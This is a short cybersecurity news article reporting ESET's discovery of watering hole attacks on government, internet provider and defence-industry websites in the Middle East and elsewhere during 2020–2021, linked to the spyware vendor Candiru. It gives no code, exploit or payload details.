ESET discovers watering hole attacks on websites in Middle East, links to Candiru

News Desk -

Share

Strategic web compromise (watering hole) attacks against high-profile websites in the Middle East have been found by ESET researchers, with a significant concentration on Yemen. Candiru, a business that sells state-of-the-art offensive software tools and related services to government organizations, is linked to the attacks. A watering hole attack compromises websites that are likely to be visited by targets of interest, allowing a website visitor’s machine to be infected. Specific visitors to these websites were most likely targeted in this campaign via a browser vulnerability.

Government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance); internet service providers in Yemen and Syria; and aerospace/military technology companies in Italy and South Africa are among the websites that have been targeted. The attackers also constructed a website that looked like it was from a medical trade show in Germany.

“Back in 2018, we developed a custom in-house system to uncover watering holes on high-profile websites. On July 11, 2020, our system notified us that the website of the Iranian embassy in Abu Dhabi had been tainted with malicious JavaScript code. Our curiosity was aroused by the high-profile nature of the targeted website, and in the following weeks we noticed that other websites with connections to the Middle East were also targeted,” says ESET researcher Matthieu Faou who uncovered the watering hole campaigns.

“The threat group went quiet until January 2021, when we observed a new wave of compromises. This second wave lasted until August 2021, when all websites were cleaned again as was the case in 2020 – likely by the perpetrators themselves,” he adds.

“The attackers also mimicked a website belonging to the World Forum for Medicine’s MEDICA Trade Fair held in Düsseldorf, Germany. The operators cloned the original website and added a small piece of JavaScript code. It is likely that the attackers were not able to compromise the legitimate website and had to set up a fake one to inject their malicious code,” says Faou.

“In a blogpost about Candiru by Citizen Lab at the University of Toronto, the section called ‘A Saudi-Linked Cluster?’ mentions a spearphishing document that was uploaded to VirusTotal and multiple domains operated by the attackers. The domain names are variations of genuine URL shorteners and web analytics websites, which is the same technique used for the domains being seen in the watering hole attacks,” explains Faou, linking the attacks to Candiru.

On the other hand, ESET researchers were unable to obtain either an exploit or the final payload. This demonstrates how highly targeted this campaign is, since the threat actors have opted to concentrate on their activities and do not want to burn their zero-day exploits. The infected websites are merely used as a launching pad for the final targets.

The malware tested the operating system and web browser during the 2020 campaign. The ad did not target mobile devices because the selection process was dependent on PC software. In the second wave, the attackers began modifying scripts already on the hacked websites to be more stealthy.

As a result, there’s a good chance that the people running the watering hole campaigns are Candiru customers. The people who created the documents and the people who run the bars could be the same. Candiru is a private Israeli spyware firm that was recently listed to the US Commerce Department’s Entity List. This could make it impossible for any US-based company to do business with Candiru without first acquiring a Department of Commerce license.

ESET stopped monitoring activity from this operation around the end of July 2021, shortly after Citizen Lab, Google, and Microsoft published blogposts detailing Candiru’s activities. The operators appear to be taking a break, most likely to retool and make their operation more stealthy. They are expected to return in the next months, according to ESET Research.

Read the blog post “Strategic online compromise in the Middle East with a pinch of Candiru” on WeLiveSecurity for more technical details regarding these watering hole attacks against Middle Eastern websites. Make sure to follow ESET Research on Twitter for the most up-to-date information.


Leave a reply